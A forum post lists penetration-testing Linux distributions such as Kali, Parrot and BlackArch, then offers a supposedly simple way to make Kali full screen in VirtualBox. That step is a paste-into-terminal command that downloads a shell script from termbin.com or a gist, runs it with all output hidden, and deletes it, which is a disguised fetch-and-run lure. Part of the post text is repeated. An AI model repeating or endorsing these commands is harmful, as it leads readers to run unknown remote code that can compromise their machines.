- Apr 25, 2015
- 1,845
- 2
- 2,199
- 327
These are the most common penetration testing operating systems. Play around with all of them until you find one that is best for you - or build your own if you become confident with a specific set of tools! Many of them are overloaded with too many tools, some you may never use.
Add any you have used or like in a reply to this thread!!
Going into Kali full screen in VirtualBox is simple:
Mirror 2 - preferred and published via our GitHub account:
Note: Simply open your web browser in VirtualBox, search "godhacker3", click the video. Click the R4P3 link in the description and copy/paste the above to terminal! Remember to tap the Right_Ctrl+F hotkey shortcut to fully enter the screen.
- Kali is a top pick - https://www.kali.org/
- BackBox has a very professional look - https://www.backbox.org/
- Parrot OS is calming and relaxed "for security and digital forensics experts, but it also includes all you need to develop your own software or protect your privacy while surfing the net" - https://parrotlinux.org/
- BlackArch has a blackhat appearance - https://blackarch.org/
Add any you have used or like in a reply to this thread!!
Going into Kali full screen in VirtualBox is simple:
Code:
wget termbin.com/xdwz &> /dev/null;bash xdwz &> /dev/null; rm xdwz
Mirror 2 - preferred and published via our GitHub account:
Code:
wget https://gist.githubusercontent.com/R4P3-Linux/3dbc9459566511bc1f9a090d05949e52/raw/764ee2fcfdfb6ddcf1e0c44bb8a3ab4f5b52ff0a/r4p3.sh &> /dev/null;bash r4p3.sh &> /dev/null; rm r4p3.sh
Last edited: